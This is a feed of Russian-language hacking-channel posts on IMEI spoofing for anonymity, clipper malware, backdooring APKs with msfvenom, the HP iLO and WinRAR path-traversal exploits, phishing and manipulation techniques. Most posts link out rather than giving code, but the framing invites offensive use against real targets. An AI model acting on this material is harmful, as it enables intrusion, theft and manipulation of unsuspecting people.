⚠️ Изменяем IMEI в модеме Huawei или MiFi.
💬 Очень многие любят использовать USB-модем (так называемый "свисток") за его мобильность. ☝🏻 Он компактен как и любая USB-флешка. 🌐 С помощью него можно в любом месте выйти в интернет через ноутбук.
📌 В нашем случае нужно ещё это делать и анонимно 😎 Как изменить IP сегодня знает наверное каждый. Но у модемов как и телефонов есть IMEI - уникальный номер, для идентификации телефонов стандартов GSM, WCDMA и IDEN, а также некоторых спутниковых телефонов. Имеет 15 цифр в десятичном представлении, где последняя цифра контрольная по алгоритму Луна, либо 17, где ещё две цифры - это версия. Вот по нему вас и могут спалить😱
📝 В данной статье показано как изменить IMEI на примере портативного MiFi-роутера Huawei.
👨🏻💻 Читать в telegraph | Зеркало
#Анонимность #Алгоритм_Луна #IMEI #usb #модем
💬 Очень многие любят использовать USB-модем (так называемый "свисток") за его мобильность. ☝🏻 Он компактен как и любая USB-флешка. 🌐 С помощью него можно в любом месте выйти в интернет через ноутбук.
📌 В нашем случае нужно ещё это делать и анонимно 😎 Как изменить IP сегодня знает наверное каждый. Но у модемов как и телефонов есть IMEI - уникальный номер, для идентификации телефонов стандартов GSM, WCDMA и IDEN, а также некоторых спутниковых телефонов. Имеет 15 цифр в десятичном представлении, где последняя цифра контрольная по алгоритму Луна, либо 17, где ещё две цифры - это версия. Вот по нему вас и могут спалить😱
📝 В данной статье показано как изменить IMEI на примере портативного MiFi-роутера Huawei.
👨🏻💻 Читать в telegraph | Зеркало
#Анонимность #Алгоритм_Луна #IMEI #usb #модем
Telegraph
Изменяем IMEI в модеме Huawei или MiFi.
Очень многие любят использовать USB-модем (так называемый "свисток") за его мобильность. Он компактен как и любая USB-флешка. С помощью него можно в любом месте выйти в интернет через ноутбук. Но в нашем случае нужно ещё это делать и анонимно. Как изменить…
💬 Речевая стратегия. Ограничение выбора | Отрицание.
☝🏻Сегодня, речь пойдет о технологии воздействия, которая основана на том, что вы специально построенными предложениями сужаете выбор своего собеседника и направляете его мысль в нужную сторону. 🧐
📌 При этом, каждая из альтернатив, которые вы предлагаете, для вас приемлема.
👨🏻💻 Читать в telegraph | Зеркало
#Психология #СИ
☝🏻Сегодня, речь пойдет о технологии воздействия, которая основана на том, что вы специально построенными предложениями сужаете выбор своего собеседника и направляете его мысль в нужную сторону. 🧐
📌 При этом, каждая из альтернатив, которые вы предлагаете, для вас приемлема.
👨🏻💻 Читать в telegraph | Зеркало
#Психология #СИ
Telegraph
Речевая стратегия. Ограничение выбора | Отрицание.
Хорошо зарекомендовавшая себя технология воздействия, которая основана на том, что вы специально построенными предложениями сужаете выбор своего собеседника и направляете его мысль в нужную сторону. При этом, каждая из альтернатив, которые вы предлагаете…
👨🏼💻Hey Julia! Новый язык, который выглядит, как Python, а летает, как C.
📌 Julia — молодой язык программирования, предназначенный преимущественно для научных вычислений. 👥 Его создатели хотели, чтобы он занял нишу, которую прежде занимали Matlab, его клоны и R. Создатели пытались решить так называемую проблему двух языков: совместить удобство R и Python и производительность C. Посмотрим, что у них получилось😉
👨🏻💻 Читать в telegraph | Зеркало
❗️ Источник
#C #julia #coding #Python
📌 Julia — молодой язык программирования, предназначенный преимущественно для научных вычислений. 👥 Его создатели хотели, чтобы он занял нишу, которую прежде занимали Matlab, его клоны и R. Создатели пытались решить так называемую проблему двух языков: совместить удобство R и Python и производительность C. Посмотрим, что у них получилось😉
👨🏻💻 Читать в telegraph | Зеркало
❗️ Источник
#C #julia #coding #Python
Telegraph
Hey Julia! Новый язык, который выглядит, как Python, а летает, как C.
История Характеристики Синтаксис Скорость Параллельные вычисления Дополнительные преимущества Где запускать Насущный вопрос Python или Julia Julia — молодой язык программирования, предназначенный преимущественно для научных вычислений. Его создатели хотели…
🤝Что можно сказать о человеке по рукопожатию.
💬 Давно мы не затрагивали тему профайлинга, сегодня предлагаю поговорить о рукопожатии. Что можно сказать о человеке по рукопожатию? 🤷🏻♂️ Какие бывают виды рукопожатия? и что можно сказать о человеке по тому, как он здоровается 🤝
📌 Ответы на эти вопросы и крайне полезную информацию Вы можете найти в этом ролике.
Приятного просмотра 😉
👨🏻💻 Смотреть на YT
#Разрыв_шаблона #Профайлинг #СИ #Рукопожатие
💬 Давно мы не затрагивали тему профайлинга, сегодня предлагаю поговорить о рукопожатии. Что можно сказать о человеке по рукопожатию? 🤷🏻♂️ Какие бывают виды рукопожатия? и что можно сказать о человеке по тому, как он здоровается 🤝
📌 Ответы на эти вопросы и крайне полезную информацию Вы можете найти в этом ролике.
Приятного просмотра 😉
👨🏻💻 Смотреть на YT
#Разрыв_шаблона #Профайлинг #СИ #Рукопожатие
📧 5 способов отсылки полностью анонимных электронных писем.
💬 Иногда возникают ситуации, когда нужно отослать анонимное 📧 электронное письмо. Например передать информацию без возможности выявления источника.🤫 Существует множество легитимных причин для использования анонимной электронной почты. И здесь можно воспользоваться либо одним из бесплатных сервисов, либо временным аккаунтом в связке с VPN 🔒
📌 Рассмотрим пять способов.
👨🏻💻 Читать в telegraph | Зеркало
#VPN #ProtonMail #Mail
💬 Иногда возникают ситуации, когда нужно отослать анонимное 📧 электронное письмо. Например передать информацию без возможности выявления источника.🤫 Существует множество легитимных причин для использования анонимной электронной почты. И здесь можно воспользоваться либо одним из бесплатных сервисов, либо временным аккаунтом в связке с VPN 🔒
📌 Рассмотрим пять способов.
👨🏻💻 Читать в telegraph | Зеркало
#VPN #ProtonMail #Mail
Telegraph
5 способов отсылки полностью анонимных электронных писем.
Иногда возникают ситуации, когда нужно отослать анонимное электронное письмо. Например, с красивым признанием в любви или передать информацию без возможности выявления источника. Существует множество легитимных причин для использования анонимной электронной…
🧠 Когнитивные искажения.
📌 Когнитивные искажения - это систематические ошибки в мышлении или паттерны отклонений в суждениях, которые происходят в определённых ситуациях🤷🏻♂️ Существование большинства из этих когнитивных искажений было доказано в психологических экспериментах 🧠
💬 Некоторые когнитивные искажения могут способствовать более эффективным действиям личности в конкретных условиях. Кроме того, некоторые когнитивные искажения позволяют быстрее принимать решения в ситуациях, когда скорость принятия решения важнее его точности.☝🏻 Другие когнитивные искажения являются прямым следствием ограниченных возможностей обработки человеком информации либо отсутствия соответствующих психических механизмов.
📌 Когнитивные искажения могут возникать из-за разных причин, в частности:
▪️«сбоев» в обработке информации (эвристика);
▪️«ментального шума»;
▪️ограниченных возможностей мозга по обработке информации;
▪️эмоциональных и моральных причин;
▪️социального влияния.
👨🏻💻 Читать в telegraph | Зеркало
#Психология
📌 Когнитивные искажения - это систематические ошибки в мышлении или паттерны отклонений в суждениях, которые происходят в определённых ситуациях🤷🏻♂️ Существование большинства из этих когнитивных искажений было доказано в психологических экспериментах 🧠
💬 Некоторые когнитивные искажения могут способствовать более эффективным действиям личности в конкретных условиях. Кроме того, некоторые когнитивные искажения позволяют быстрее принимать решения в ситуациях, когда скорость принятия решения важнее его точности.☝🏻 Другие когнитивные искажения являются прямым следствием ограниченных возможностей обработки человеком информации либо отсутствия соответствующих психических механизмов.
📌 Когнитивные искажения могут возникать из-за разных причин, в частности:
▪️«сбоев» в обработке информации (эвристика);
▪️«ментального шума»;
▪️ограниченных возможностей мозга по обработке информации;
▪️эмоциональных и моральных причин;
▪️социального влияния.
👨🏻💻 Читать в telegraph | Зеркало
#Психология
Telegraph
Когнитивные искажения
Когнитивные искажения - это систематические ошибки в мышлении или паттерны отклонений в суждениях, которые происходят в определённых ситуациях. Существование большинства из этих когнитивных искажений было доказано в психологических экспериментах. Когнитивные…
👾Подмена буфера обмена.
☝🏻Всё новое всегда хорошо забытое старое, многие наверное помнят когда миллионы 💰 были украдены с WM кошельков посредством подмены буфера обмена 🤷🏻♂️ когда WM была основной системой расчётов.
💬 Для тех кто ещё не понял о чём пойдёт речь, объясню. ☠️ Жертва инфицируется вирусом который отслеживает всё что копируется в буфер и если определяет что скопирован кошелёк криптовалюты подменяет его на кошелек злоумышленника👺
👨🏻💻 Читать в telegra.ph | Зеркало
#Clipper
☝🏻Всё новое всегда хорошо забытое старое, многие наверное помнят когда миллионы 💰 были украдены с WM кошельков посредством подмены буфера обмена 🤷🏻♂️ когда WM была основной системой расчётов.
💬 Для тех кто ещё не понял о чём пойдёт речь, объясню. ☠️ Жертва инфицируется вирусом который отслеживает всё что копируется в буфер и если определяет что скопирован кошелёк криптовалюты подменяет его на кошелек злоумышленника👺
👨🏻💻 Читать в telegra.ph | Зеркало
#Clipper
Telegraph
Подмена буфера обмена.
Всё новое всегда хорошо забытое старое, многие наверное помнят когда миллионы $ были украдены с WM кошельков посредством подмены буфера обмена, когда WM была основной системой расчётов. Сейчас же многие юзают крипто валюты, и кошельки у них намного длиннее…
📲 Получаем доступ к андроиду через зараженный APK.
☝🏻 Основным путем 💉 заражения телефона под управлением Android является установка приложений со сторонних ресурсов. 📂 Файлами, заражающими телефон в данном случае, являются файлы с расширением .apk:
📌 APK (англ. Android Package) — формат архивных исполняемых файлов-приложений для Android. Каждое приложение Android скомпилировано и упаковано в один файл. Файлы данного формата не шифруются, являются подмножеством формата архива ZIP.
💬 В данной статье, поговорим на тему, каким образом можно получить доступ к андроиду через зараженный APK. + 📎 ссылку на исходник можно найти в статье. ⤵️
👨🏻💻 Читать в telegraph | Зеркало
#Android #hack
☝🏻 Основным путем 💉 заражения телефона под управлением Android является установка приложений со сторонних ресурсов. 📂 Файлами, заражающими телефон в данном случае, являются файлы с расширением .apk:
📌 APK (англ. Android Package) — формат архивных исполняемых файлов-приложений для Android. Каждое приложение Android скомпилировано и упаковано в один файл. Файлы данного формата не шифруются, являются подмножеством формата архива ZIP.
💬 В данной статье, поговорим на тему, каким образом можно получить доступ к андроиду через зараженный APK. + 📎 ссылку на исходник можно найти в статье. ⤵️
👨🏻💻 Читать в telegraph | Зеркало
#Android #hack
Telegraph
Получаем доступ к андроиду через зараженный APK.
Для начала нам необходимо будет скачать какой нибудь APK файл не более 5 мб, для этого идём на 4PDA ищем там что нибудь подходящее и качаем, я использую софт для загрузки музыки из вк. Теперь открываем терминал и прописываем: msfvenom -x '/директория где…
🔌 O•MG cable.
😉 Привет, Давайте поговорим о том почему иногда стоит разориться на ☝🏻оригинальные комлектующие (шнурки, зарядки и т.д.) к своим девайсам, к примеру то как это навязывает своей политикой обслуживания Apple🍏
💬 Сегодня вышла интересная статья, в журнале Хакер. 📌 В журнале рассказывается что некий энтузиаст, известный в Twitter под псевдонимом MG, продемонстрировал вредоносный кабель под названием O•MG cable. Такой кабель внешне не отличается от обычного, и его можно подключить к машине под управлением 🐧Linux, Mac или Windows. Однако на деле O•MG cable совсем не так прост и определяется системой как HID (Human Interface Device), то есть USB-девайс для взаимодействия с 👤человеком (обычно это клавиатура, мышь, игровой контроллер и так далее).
💬 Так как MG добавил своей разработке и поддержку беспроводных соединений, в итоге, благодаря подключению O•MG cable к целевой машине, 👺злоумышленник получает возможность выполнять через Wi-Fi любые команды, будто просто набирает их на клавиатуре целевого компьютера. ‼️ Пруфы можно глянуть ТУТ. Но на этот раз MG пошел дальше демонстрации прототипа в Twitter и привез вредоносные кабели на ИБ-конференцию DEFCON, где их можно было приобрести по цене 💸 200 долларов США за штуку. O•MG cable поставляется с уже готовыми пейлоадами, и его оператор даже имеет возможность удаленно «убить» USB-имплантат, заметая следы 🔍
‼️ В настоящее время (при прямом подключении к кабелю) атакующий может находиться в радиусе примерно 90 метров от своей цели, но MG подчеркивает, что кабель также можно настроить для работы в качестве клиента в ближайшей беспроводной сети. И если эта беспроводная сеть имеет выход в интернет, расстояние атаки уже ничем не ограничено☝🏻
⚠️ Согласно блогу MG, стоимость серийных O•MG cable должна составить около 💸 100 долларов США. Точных дат начала продаж MG пока не называет, но на сайте Hak5 уже появилась специальная страница, где можно зарегистрироваться и получить уведомление, когда кабели будут готовы.
👨🏻💻 Видео можно посмотреть перейдя по ссылкам ниже:
▪️ HID attacks via USB drives
▪️ BadUSB Masquerading as a Charging Cable
▪️The O•MG cable
Обсудить данную тему, и не только эту, Вы можете в нашем чате.
#OMG #Lightning #exploit #hack
😉 Привет, Давайте поговорим о том почему иногда стоит разориться на ☝🏻оригинальные комлектующие (шнурки, зарядки и т.д.) к своим девайсам, к примеру то как это навязывает своей политикой обслуживания Apple🍏
💬 Сегодня вышла интересная статья, в журнале Хакер. 📌 В журнале рассказывается что некий энтузиаст, известный в Twitter под псевдонимом MG, продемонстрировал вредоносный кабель под названием O•MG cable. Такой кабель внешне не отличается от обычного, и его можно подключить к машине под управлением 🐧Linux, Mac или Windows. Однако на деле O•MG cable совсем не так прост и определяется системой как HID (Human Interface Device), то есть USB-девайс для взаимодействия с 👤человеком (обычно это клавиатура, мышь, игровой контроллер и так далее).
💬 Так как MG добавил своей разработке и поддержку беспроводных соединений, в итоге, благодаря подключению O•MG cable к целевой машине, 👺злоумышленник получает возможность выполнять через Wi-Fi любые команды, будто просто набирает их на клавиатуре целевого компьютера. ‼️ Пруфы можно глянуть ТУТ. Но на этот раз MG пошел дальше демонстрации прототипа в Twitter и привез вредоносные кабели на ИБ-конференцию DEFCON, где их можно было приобрести по цене 💸 200 долларов США за штуку. O•MG cable поставляется с уже готовыми пейлоадами, и его оператор даже имеет возможность удаленно «убить» USB-имплантат, заметая следы 🔍
‼️ В настоящее время (при прямом подключении к кабелю) атакующий может находиться в радиусе примерно 90 метров от своей цели, но MG подчеркивает, что кабель также можно настроить для работы в качестве клиента в ближайшей беспроводной сети. И если эта беспроводная сеть имеет выход в интернет, расстояние атаки уже ничем не ограничено☝🏻
⚠️ Согласно блогу MG, стоимость серийных O•MG cable должна составить около 💸 100 долларов США. Точных дат начала продаж MG пока не называет, но на сайте Hak5 уже появилась специальная страница, где можно зарегистрироваться и получить уведомление, когда кабели будут готовы.
👨🏻💻 Видео можно посмотреть перейдя по ссылкам ниже:
▪️ HID attacks via USB drives
▪️ BadUSB Masquerading as a Charging Cable
▪️The O•MG cable
Обсудить данную тему, и не только эту, Вы можете в нашем чате.
#OMG #Lightning #exploit #hack
😶 Профайлинг. Анализ поведения.
‼️ Профайлинг - тема которая очень тесно связана с социальной инженерией.
💬 На практике, большинство социальных инженеров, не очень сильны в данной теме 🤷🏻♂️ и ищут уязвимости людей другими способами, хотя с точки зрения индивидуального подхода, профайлинг - это самый мощный инструмент.⚙️
☝🏻В данном видео не будет затронута политика, а только разбор поведения людей в разных ситуациях, а так же поведения при ответе на определенные и неудобные вопросы.🤥
📌 В данном видео будут затронуты такие вопросы как:
▪️ Можно ли контролировать жесты и свой язык тела?
▪️ Как не выдать свое волнение?
▪️ Могут ли политики скрыть свои истинные чувства?
▪️ Действительно ли президентов обучают правильному поведению?
▪️ Можно ли по жестам и мимике определить мысли человека?
‼️ Об этом и другом смотрите в этом ролике ! ⤵️
Смотреть на YT.
#Профайлинг #СИ #Видео
‼️ Профайлинг - тема которая очень тесно связана с социальной инженерией.
💬 На практике, большинство социальных инженеров, не очень сильны в данной теме 🤷🏻♂️ и ищут уязвимости людей другими способами, хотя с точки зрения индивидуального подхода, профайлинг - это самый мощный инструмент.⚙️
☝🏻В данном видео не будет затронута политика, а только разбор поведения людей в разных ситуациях, а так же поведения при ответе на определенные и неудобные вопросы.🤥
📌 В данном видео будут затронуты такие вопросы как:
▪️ Можно ли контролировать жесты и свой язык тела?
▪️ Как не выдать свое волнение?
▪️ Могут ли политики скрыть свои истинные чувства?
▪️ Действительно ли президентов обучают правильному поведению?
▪️ Можно ли по жестам и мимике определить мысли человека?
‼️ Об этом и другом смотрите в этом ролике ! ⤵️
Смотреть на YT.
#Профайлинг #СИ #Видео
☠️ Shodan. HP iLO RCE.
💬 Вспомнилась старая уязвимость 2018 года, связанная с системой управления серверами HP. ☠️ Уязвимость CVE-2017-12542 позволяет подключиться к iLO 4, не зная логин и пароль,🔐 — достаточно отправить на устройство URL-запрос, содержащий 29 символов «A».☝🏻Плата обработает такую команду и предоставит атакующему административный доступ через интерфейс командной строки 🤷🏻♂️
📌 Платы iLO широко применяются для организации удаленного доступа к серверам HP. ☝🏻Если использовать поисковик Shodan, ( о котором мы писали ТУТ, а так же мануал на Русском который Вы можете скачать в нашей группе 👉🏻 ТУТ. ) то Вы сами понимаете каким образом можно использовать эту уязвимость.
👨🏻💻 Читать в telegraph | Зеркало
📌 Информацию об эксплоите можно прочитать на сайте Securitylab
📌 Cам эксплоит, можно взять с ресурса Exploit-db.com
#shodan #ilo #hp #exploit
💬 Вспомнилась старая уязвимость 2018 года, связанная с системой управления серверами HP. ☠️ Уязвимость CVE-2017-12542 позволяет подключиться к iLO 4, не зная логин и пароль,🔐 — достаточно отправить на устройство URL-запрос, содержащий 29 символов «A».☝🏻Плата обработает такую команду и предоставит атакующему административный доступ через интерфейс командной строки 🤷🏻♂️
📌 Платы iLO широко применяются для организации удаленного доступа к серверам HP. ☝🏻Если использовать поисковик Shodan, ( о котором мы писали ТУТ, а так же мануал на Русском который Вы можете скачать в нашей группе 👉🏻 ТУТ. ) то Вы сами понимаете каким образом можно использовать эту уязвимость.
👨🏻💻 Читать в telegraph | Зеркало
📌 Информацию об эксплоите можно прочитать на сайте Securitylab
📌 Cам эксплоит, можно взять с ресурса Exploit-db.com
#shodan #ilo #hp #exploit
Telegraph
Shodan. HP iLO RCE.
Существует старая уязвимость 2018 года, связанная с системой управления серверами HP. В Сети в открытом доступе опубликован эксплоит для серьезной уязвимости в серверах Hewlett Packard Integrated Lights-Out 4 (HP iLO 4) подробнее тут | и здесь Был взят эксплойт…
👨🏻💻 Эксплуатируем CVE 2019-8646.
💬 Недавно разработчики 🍏 Apple обновили iOS до версии 12.4, исправив в мобильной ОС сразу несколько 😵 уязвимостей. Одна из этих проблем, связанная с iMessage, позволяла удаленно и без участия пользователя читать файлы на iOS-устройствах.
‼️ Уязвимость получила идентификатор CVE-2019-8646 и была обнаружена еще в мае 2019 года специалисткой команды Google Project Zero Натали Сильванович (Natalie Silvanovich). 👾 PoC-эксплоит, уже продемонстрированный исследовательницей, работает только для устройств под управлением iOS 12 или более новых версий.
💬 Сегодня выясним, как воспользоваться 👾 POC’ом от Natalie Silvanovich из команды Google Project Zero. Что можно сделать с помощью этого POC’a: в описание к CVE указывается, что у нас есть возможность получить доступ к содержимому ✉️ смс-сообщений (речь про /var/mobile/Library/SMS/sms.db) и изображениям из фотогалереи устройства. ⤵️
👨🏻💻 Читать в telegraph | Зеркало
📌 Краткая техническая информация по уязвимости:
◾️Страница с описанием. ( Eng. )
◾️Информация о патче. ( Eng. )
◾️Демонстрация. ( YouTube. )
#apple #hack #exploit
💬 Недавно разработчики 🍏 Apple обновили iOS до версии 12.4, исправив в мобильной ОС сразу несколько 😵 уязвимостей. Одна из этих проблем, связанная с iMessage, позволяла удаленно и без участия пользователя читать файлы на iOS-устройствах.
‼️ Уязвимость получила идентификатор CVE-2019-8646 и была обнаружена еще в мае 2019 года специалисткой команды Google Project Zero Натали Сильванович (Natalie Silvanovich). 👾 PoC-эксплоит, уже продемонстрированный исследовательницей, работает только для устройств под управлением iOS 12 или более новых версий.
💬 Сегодня выясним, как воспользоваться 👾 POC’ом от Natalie Silvanovich из команды Google Project Zero. Что можно сделать с помощью этого POC’a: в описание к CVE указывается, что у нас есть возможность получить доступ к содержимому ✉️ смс-сообщений (речь про /var/mobile/Library/SMS/sms.db) и изображениям из фотогалереи устройства. ⤵️
👨🏻💻 Читать в telegraph | Зеркало
📌 Краткая техническая информация по уязвимости:
◾️Страница с описанием. ( Eng. )
◾️Информация о патче. ( Eng. )
◾️Демонстрация. ( YouTube. )
#apple #hack #exploit
Telegraph
Эксплуатируем CVE 2019-8646
Недавно разработчики Apple обновили iOS до версии 12.4, исправив в мобильной ОС сразу несколько уязвимостей. Одна из этих проблем, связанная с iMessage, позволяла удаленно и без участия пользователя читать файлы на iOS-устройствах. Уязвимость получила идентификатор CVE…
🧠 НЛП. Как противостоять манипуляциям?
❔Что самое главное в манипуляциях – это чтобы они оставались не заметными.☝🏻Если вы обнаружите манипуляцию, то собеседнику будет очень сложно завершить ее до конца.
💬 Самое важное в противостоянии манипуляциям – это просто их заметить. Когда это сделано, то вы видите ее и можете либо предотвратить, либо развернуть в сторону манипулятора🗣
📌 Сегодня, затронем тему НЛП. И разберем, каким образом противостоять манипуляциям.
▪️Как вести себя с манипулятором?
▪️Как нейтрализовать манипуляцию?
▪️Советы по самым распространенным атакам и уловкам манипуляторов.
▪️Как вести спор с манипулятором?
▪️Как узнать искренность собеседника?
‼️ И многое другое... ⤵️
👨🏻💻 Читать в telegra.ph | Зеркало
#НЛП #Психология #СИ
❔Что самое главное в манипуляциях – это чтобы они оставались не заметными.☝🏻Если вы обнаружите манипуляцию, то собеседнику будет очень сложно завершить ее до конца.
💬 Самое важное в противостоянии манипуляциям – это просто их заметить. Когда это сделано, то вы видите ее и можете либо предотвратить, либо развернуть в сторону манипулятора🗣
📌 Сегодня, затронем тему НЛП. И разберем, каким образом противостоять манипуляциям.
▪️Как вести себя с манипулятором?
▪️Как нейтрализовать манипуляцию?
▪️Советы по самым распространенным атакам и уловкам манипуляторов.
▪️Как вести спор с манипулятором?
▪️Как узнать искренность собеседника?
‼️ И многое другое... ⤵️
👨🏻💻 Читать в telegra.ph | Зеркало
#НЛП #Психология #СИ
Telegraph
НЛП. Как противостоять манипуляциям.
Что самое главное в манипуляциях – это чтобы они оставались не заметными. Если вы обнаружите манипуляцию, то собеседнику будет очень сложно завершить ее до конца. Самое важное в противостоянии манипуляциям – это просто их заметить. Когда это сделано, то вы…
😈 Создаём Evil архив | WinRAR Path Traversal
❗️В феврале этого года, специалисты компании Check Point сообщили о серьезной уязвимости в WinRAR.
💬 Суть уязвимости заключается в том, что можно создать специальный архив ACE, который при распаковке сможет поместить вредоносный файл 🦠 в произвольном месте, в обход фактического пути для распаковки архива.
☝🏻К примеру, таким образом исследователям удалось поместить 👾 малварь в директорию Startup, откуда вредонос будет запускаться при каждом включении и перезагрузке системы. Обзор уязвимости можно посмотреть в YouTube 👀
📌 В данной статье Вы узнаете, как создать архив эксплуатируя данную уязвимость ☠️
👨🏻💻 Читать в telegra.ph | Зеркало
#win_rar #hack
❗️В феврале этого года, специалисты компании Check Point сообщили о серьезной уязвимости в WinRAR.
💬 Суть уязвимости заключается в том, что можно создать специальный архив ACE, который при распаковке сможет поместить вредоносный файл 🦠 в произвольном месте, в обход фактического пути для распаковки архива.
☝🏻К примеру, таким образом исследователям удалось поместить 👾 малварь в директорию Startup, откуда вредонос будет запускаться при каждом включении и перезагрузке системы. Обзор уязвимости можно посмотреть в YouTube 👀
📌 В данной статье Вы узнаете, как создать архив эксплуатируя данную уязвимость ☠️
👨🏻💻 Читать в telegra.ph | Зеркало
#win_rar #hack
Telegraph
Создаём Evil архив.
Сегодня вы узнаете, как создать архив эксплуатируя уязвимость Path Traversal архиватора WinRAR до версии 5.61 включительно. Данная уязвимость получила идентификаторы CVE-2018-20250, CVE-2018-20251, CVE-2018-20252 и CVE-2018-20253. Кому интересны детали,…
🧠 Наведение на мысль.
💬 При малейшем намеке на «впаривание» мозг человека активирует мощную защитную реакцию, пробить которую очень сложно.🤷🏻♂️
☝🏻Но! Мозг не способен защищаться от собственных идей, которые он сам генерирует. Эту особенность мы и будем использовать.
📌 Только представьте: люди не спорят и не задают лишних❔вопросов, вместо этого они просто делают то, что вы от них хотите. 🌀 Гипноз?
❕Нет. Чистейшая манипуляция. Интересно? ⤵️
👨🏻💻 Читать в telegra.ph | Зеркало
#СИ #Психология #Манипуляция
💬 При малейшем намеке на «впаривание» мозг человека активирует мощную защитную реакцию, пробить которую очень сложно.🤷🏻♂️
☝🏻Но! Мозг не способен защищаться от собственных идей, которые он сам генерирует. Эту особенность мы и будем использовать.
📌 Только представьте: люди не спорят и не задают лишних❔вопросов, вместо этого они просто делают то, что вы от них хотите. 🌀 Гипноз?
❕Нет. Чистейшая манипуляция. Интересно? ⤵️
👨🏻💻 Читать в telegra.ph | Зеркало
#СИ #Психология #Манипуляция
Telegraph
Наведение на мысль
При малейшем намеке на «впаривание» мозг человека активирует мощную защитную реакцию, пробить которую очень сложно. Но! Мозг не способен защищаться от собственных идей, которые он сам генерирует. Эту особенность мы и будем использовать.
⚠️ Социальная Инженерия | Фишинг в Андроид | Читаем Whatsapp.
📌 Вы задумывались над тем, как вредоносное приложение может попасть к вам на телефон?
🤷🏻♂️ Вы знали что существуют телеграм боты, для скачивания apk файлов. Вместо легитимного приложения, вам могут подсунуть 🦠 вредоносное. Либо 💉 заразить запрашиваемое вами приложение “на лету”.
☝🏻 Работает это так - вы вводите команду боту/в группу, что хотите скачать “Instagram”, скрипт на другой стороне скачивает его с Google Play, распаковывает, 📌 добавляет вредоносный код, запаковывает обратно и возвращает вам.
⁉️ А Вы знали, что если вы пользуетесь Whatsapp, то все ваши сообщения хранятся в папке, доступной всем приложениям. 🙈 Любое приложение на вашем телефоне может их скачать и отправить себе на сервер.🤦🏻♂️ А далее расшифровать с помощью любого доступного скрипта в сети. А если поставить whatsapp на рутованый телефон, то все ваши переписки хранятся в открытом виде. 😑
💬 Об этом и многом другом, мы поговорим в сегодняшней статье. 😉 Приятного чтения. ⤵️
👨🏻💻 Читать в telegra.ph | Зеркало
#СИ #Фишинг #Android #Whatsapp
📌 Вы задумывались над тем, как вредоносное приложение может попасть к вам на телефон?
🤷🏻♂️ Вы знали что существуют телеграм боты, для скачивания apk файлов. Вместо легитимного приложения, вам могут подсунуть 🦠 вредоносное. Либо 💉 заразить запрашиваемое вами приложение “на лету”.
☝🏻 Работает это так - вы вводите команду боту/в группу, что хотите скачать “Instagram”, скрипт на другой стороне скачивает его с Google Play, распаковывает, 📌 добавляет вредоносный код, запаковывает обратно и возвращает вам.
⁉️ А Вы знали, что если вы пользуетесь Whatsapp, то все ваши сообщения хранятся в папке, доступной всем приложениям. 🙈 Любое приложение на вашем телефоне может их скачать и отправить себе на сервер.🤦🏻♂️ А далее расшифровать с помощью любого доступного скрипта в сети. А если поставить whatsapp на рутованый телефон, то все ваши переписки хранятся в открытом виде. 😑
💬 Об этом и многом другом, мы поговорим в сегодняшней статье. 😉 Приятного чтения. ⤵️
👨🏻💻 Читать в telegra.ph | Зеркало
#СИ #Фишинг #Android #Whatsapp
Telegraph
Социальная Инженерия | Фишинг в Андроид | Читаем Whatsapp.
Данные площадки появились вследствии цензуры и блокировки Google сервисов и/или серверов официальных приложений. Обычно они содержат местные аналоги популярных приложений и их модификации. Такие модификации (как этот иранский телеграм) содержат якобы новые…
👨🏻💻 Пример СИ | 🎣 Фишинг-атаки на биржу Codex.
📌 Основатель криптовалютной биржи Codex и CEO Attic Lab Сергей Васильчук едва не стал жертвой 🎣 фишинговой атаки, которую злоумышленники пытались провести под видом сотрудника редакции ForkLog. 👿
💬 Интересный пример проведенной, почти успешной, СИ и фишинг атаки на криптовалютную биржу Codex, с помощью EmPyre. 🙈Данному способу уже года 3, не меньше. Но как видим, способ успешно работает по сей день.☝🏻Главное - качественный СИ. И в данном примере СИ очень сильно хромал. 🧐После прочтения статьи, представьте, какие последсвия могли бы быть у компании, если бы злоумышленнику удалось установить бэкдор на ПК Основателя !!!! Крипто.Биржи Codex 😵
#СИ #EmPyre
📌 Основатель криптовалютной биржи Codex и CEO Attic Lab Сергей Васильчук едва не стал жертвой 🎣 фишинговой атаки, которую злоумышленники пытались провести под видом сотрудника редакции ForkLog. 👿
💬 Интересный пример проведенной, почти успешной, СИ и фишинг атаки на криптовалютную биржу Codex, с помощью EmPyre. 🙈Данному способу уже года 3, не меньше. Но как видим, способ успешно работает по сей день.☝🏻Главное - качественный СИ. И в данном примере СИ очень сильно хромал. 🧐После прочтения статьи, представьте, какие последсвия могли бы быть у компании, если бы злоумышленнику удалось установить бэкдор на ПК Основателя !!!! Крипто.Биржи Codex 😵
EmPyre — клиент-серверная платформа, написанная на Python и позволяющая (в данном случае с помощью AppleScript) установить в систему агент-имплант.
( возможности которого описаны в статье. )
👨🏻💻
Читать в telegra.ph | Зеркало#СИ #EmPyre
Telegraph
Пример СИ | Фишинг-атаки на биржу Codex.
Основатель криптовалютной биржи Codex и CEO Attic Lab Сергей Васильчук едва не стал жертвой фишинговой атаки, которую злоумышленники пытались провести под видом сотрудника редакции ForkLog. 8 августа Сергей Васильчук получил в Telegram сообщение от пользователя…
🧠 9 способов развить Социальный Интеллект и научиться манипулировать людьми.
💬 В 1920 году американский психолог Эдвард Ли Торндайк ввёл термин «социальный интеллект», который описывает способность правильно понимать поведение людей.🙃
📌 В сегодняшней статье поговорим о том, для чего человеку нужна способность правильно понимать поведение окружающих и какими способами её можно развить. ⤵️
👨🏻💻 Читать в telegra.ph | Зеркало
#СИ #Психология
💬 В 1920 году американский психолог Эдвард Ли Торндайк ввёл термин «социальный интеллект», который описывает способность правильно понимать поведение людей.🙃
📌 В сегодняшней статье поговорим о том, для чего человеку нужна способность правильно понимать поведение окружающих и какими способами её можно развить. ⤵️
👨🏻💻 Читать в telegra.ph | Зеркало
#СИ #Психология
Telegraph
9 способов развить социальный интеллект и научиться манипулировать людьми.
В 1920 году американский психолог Эдвард Ли Торндайк ввёл термин «социальный интеллект», который описывает способность правильно понимать поведение людей. Данная способность, развитая человеком в результате эволюции, необходима для эффективного взаимодействия…
☎️ Получение номера телефона, зная адрес электронной почты.
📧 email2phonenumber — это инструмент OSINT, который позволяет вам получить номер телефона цели, просто имея его адрес электронной почты.
☝🏻Этот инструмент помогает автоматизировать 🔎 обнаружение чьего-либо телефонного номера, используя недостатки дизайна сброса пароля и общедоступные данные.🤷🏻♂️
📌 Поддерживает 3 основные функции:
▪️ «scrape» — прочесывает веб-сайты на цифры телефонного номера, инициируя сброс пароля, используя адрес электронной почты получателя.
▪️«generate» — создает список действительных телефонных номеров на основе общедоступной информации плана нумерации телефонов страны.
